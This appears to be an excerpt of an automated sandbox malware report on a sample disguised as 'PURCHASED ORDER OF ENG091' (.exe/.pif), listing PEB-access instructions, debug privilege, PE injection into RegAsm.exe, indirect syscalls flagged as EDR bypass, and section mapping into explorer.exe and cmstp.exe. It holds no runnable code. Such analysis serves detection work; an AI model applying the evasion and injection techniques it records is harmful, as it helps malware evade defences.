Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03404B4B mov eax, dword ptr fs:[00000030h]	7_2_03404B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03404B4B mov eax, dword ptr fs:[00000030h]	7_2_03404B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03422B57 mov eax, dword ptr fs:[00000030h]	7_2_03422B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03422B57 mov eax, dword ptr fs:[00000030h]	7_2_03422B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03422B57 mov eax, dword ptr fs:[00000030h]	7_2_03422B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03422B57 mov eax, dword ptr fs:[00000030h]	7_2_03422B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337EB20 mov eax, dword ptr fs:[00000030h]	7_2_0337EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337EB20 mov eax, dword ptr fs:[00000030h]	7_2_0337EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CEB1D mov eax, dword ptr fs:[00000030h]	7_2_033CEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424B00 mov eax, dword ptr fs:[00000030h]	7_2_03424B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334CB7E mov eax, dword ptr fs:[00000030h]	7_2_0334CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348B50 mov eax, dword ptr fs:[00000030h]	7_2_03348B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03418B28 mov eax, dword ptr fs:[00000030h]	7_2_03418B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03418B28 mov eax, dword ptr fs:[00000030h]	7_2_03418B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FEB50 mov eax, dword ptr fs:[00000030h]	7_2_033FEB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F8B42 mov eax, dword ptr fs:[00000030h]	7_2_033F8B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6B40 mov eax, dword ptr fs:[00000030h]	7_2_033E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6B40 mov eax, dword ptr fs:[00000030h]	7_2_033E6B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360BBE mov eax, dword ptr fs:[00000030h]	7_2_03360BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360BBE mov eax, dword ptr fs:[00000030h]	7_2_03360BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358BF0 mov eax, dword ptr fs:[00000030h]	7_2_03358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358BF0 mov eax, dword ptr fs:[00000030h]	7_2_03358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358BF0 mov eax, dword ptr fs:[00000030h]	7_2_03358BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337EBFC mov eax, dword ptr fs:[00000030h]	7_2_0337EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DCBF0 mov eax, dword ptr fs:[00000030h]	7_2_033DCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FEBD0 mov eax, dword ptr fs:[00000030h]	7_2_033FEBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03404BB0 mov eax, dword ptr fs:[00000030h]	7_2_03404BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03404BB0 mov eax, dword ptr fs:[00000030h]	7_2_03404BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350BCD mov eax, dword ptr fs:[00000030h]	7_2_03350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350BCD mov eax, dword ptr fs:[00000030h]	7_2_03350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350BCD mov eax, dword ptr fs:[00000030h]	7_2_03350BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03370BCB mov eax, dword ptr fs:[00000030h]	7_2_03370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03370BCB mov eax, dword ptr fs:[00000030h]	7_2_03370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03370BCB mov eax, dword ptr fs:[00000030h]	7_2_03370BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338CA38 mov eax, dword ptr fs:[00000030h]	7_2_0338CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03374A35 mov eax, dword ptr fs:[00000030h]	7_2_03374A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03374A35 mov eax, dword ptr fs:[00000030h]	7_2_03374A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337EA2E mov eax, dword ptr fs:[00000030h]	7_2_0337EA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338CA24 mov eax, dword ptr fs:[00000030h]	7_2_0338CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DCA11 mov eax, dword ptr fs:[00000030h]	7_2_033DCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CCA72 mov eax, dword ptr fs:[00000030h]	7_2_033CCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CCA72 mov eax, dword ptr fs:[00000030h]	7_2_033CCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338CA6F mov eax, dword ptr fs:[00000030h]	7_2_0338CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338CA6F mov eax, dword ptr fs:[00000030h]	7_2_0338CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338CA6F mov eax, dword ptr fs:[00000030h]	7_2_0338CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FEA60 mov eax, dword ptr fs:[00000030h]	7_2_033FEA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356A50 mov eax, dword ptr fs:[00000030h]	7_2_03356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360A5B mov eax, dword ptr fs:[00000030h]	7_2_03360A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360A5B mov eax, dword ptr fs:[00000030h]	7_2_03360A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358AA0 mov eax, dword ptr fs:[00000030h]	7_2_03358AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358AA0 mov eax, dword ptr fs:[00000030h]	7_2_03358AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A6AA4 mov eax, dword ptr fs:[00000030h]	7_2_033A6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03388A90 mov edx, dword ptr fs:[00000030h]	7_2_03388A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335EA80 mov eax, dword ptr fs:[00000030h]	7_2_0335EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424A80 mov eax, dword ptr fs:[00000030h]	7_2_03424A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338AAEE mov eax, dword ptr fs:[00000030h]	7_2_0338AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338AAEE mov eax, dword ptr fs:[00000030h]	7_2_0338AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350AD0 mov eax, dword ptr fs:[00000030h]	7_2_03350AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03384AD0 mov eax, dword ptr fs:[00000030h]	7_2_03384AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03384AD0 mov eax, dword ptr fs:[00000030h]	7_2_03384AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A6ACC mov eax, dword ptr fs:[00000030h]	7_2_033A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A6ACC mov eax, dword ptr fs:[00000030h]	7_2_033A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033A6ACC mov eax, dword ptr fs:[00000030h]	7_2_033A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424940 mov eax, dword ptr fs:[00000030h]	7_2_03424940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E892B mov eax, dword ptr fs:[00000030h]	7_2_033E892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D892A mov eax, dword ptr fs:[00000030h]	7_2_033D892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348918 mov eax, dword ptr fs:[00000030h]	7_2_03348918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348918 mov eax, dword ptr fs:[00000030h]	7_2_03348918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DC912 mov eax, dword ptr fs:[00000030h]	7_2_033DC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE908 mov eax, dword ptr fs:[00000030h]	7_2_033CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE908 mov eax, dword ptr fs:[00000030h]	7_2_033CE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DC97C mov eax, dword ptr fs:[00000030h]	7_2_033DC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F4978 mov eax, dword ptr fs:[00000030h]	7_2_033F4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F4978 mov eax, dword ptr fs:[00000030h]	7_2_033F4978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03376962 mov eax, dword ptr fs:[00000030h]	7_2_03376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03376962 mov eax, dword ptr fs:[00000030h]	7_2_03376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03376962 mov eax, dword ptr fs:[00000030h]	7_2_03376962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0339096E mov eax, dword ptr fs:[00000030h]	7_2_0339096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0339096E mov edx, dword ptr fs:[00000030h]	7_2_0339096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0339096E mov eax, dword ptr fs:[00000030h]	7_2_0339096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D0946 mov eax, dword ptr fs:[00000030h]	7_2_033D0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D89B3 mov esi, dword ptr fs:[00000030h]	7_2_033D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D89B3 mov eax, dword ptr fs:[00000030h]	7_2_033D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D89B3 mov eax, dword ptr fs:[00000030h]	7_2_033D89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341A9D3 mov eax, dword ptr fs:[00000030h]	7_2_0341A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033629A0 mov eax, dword ptr fs:[00000030h]	7_2_033629A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033509AD mov eax, dword ptr fs:[00000030h]	7_2_033509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033509AD mov eax, dword ptr fs:[00000030h]	7_2_033509AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033829F9 mov eax, dword ptr fs:[00000030h]	7_2_033829F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033829F9 mov eax, dword ptr fs:[00000030h]	7_2_033829F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DE9E0 mov eax, dword ptr fs:[00000030h]	7_2_033DE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A9D0 mov eax, dword ptr fs:[00000030h]	7_2_0335A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033849D0 mov eax, dword ptr fs:[00000030h]	7_2_033849D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E69C0 mov eax, dword ptr fs:[00000030h]	7_2_033E69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov eax, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov eax, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov eax, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov ecx, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov eax, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03372835 mov eax, dword ptr fs:[00000030h]	7_2_03372835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F483A mov eax, dword ptr fs:[00000030h]	7_2_033F483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F483A mov eax, dword ptr fs:[00000030h]	7_2_033F483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A830 mov eax, dword ptr fs:[00000030h]	7_2_0338A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DC810 mov eax, dword ptr fs:[00000030h]	7_2_033DC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6870 mov eax, dword ptr fs:[00000030h]	7_2_033E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6870 mov eax, dword ptr fs:[00000030h]	7_2_033E6870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DE872 mov eax, dword ptr fs:[00000030h]	7_2_033DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DE872 mov eax, dword ptr fs:[00000030h]	7_2_033DE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03380854 mov eax, dword ptr fs:[00000030h]	7_2_03380854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354859 mov eax, dword ptr fs:[00000030h]	7_2_03354859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354859 mov eax, dword ptr fs:[00000030h]	7_2_03354859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03362840 mov ecx, dword ptr fs:[00000030h]	7_2_03362840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034208C0 mov eax, dword ptr fs:[00000030h]	7_2_034208C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DC89D mov eax, dword ptr fs:[00000030h]	7_2_033DC89D

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x26DA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x2F9A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x2F9A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x152A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x152A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x292A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x148A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x118A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x148A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x292A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x26DA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x14EA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x118A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x281A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0x14EA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0x281A4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtQueueApcThread: Indirect: 0xFCA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	NtClose: Indirect: 0xFCA56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write	Jump to behavior
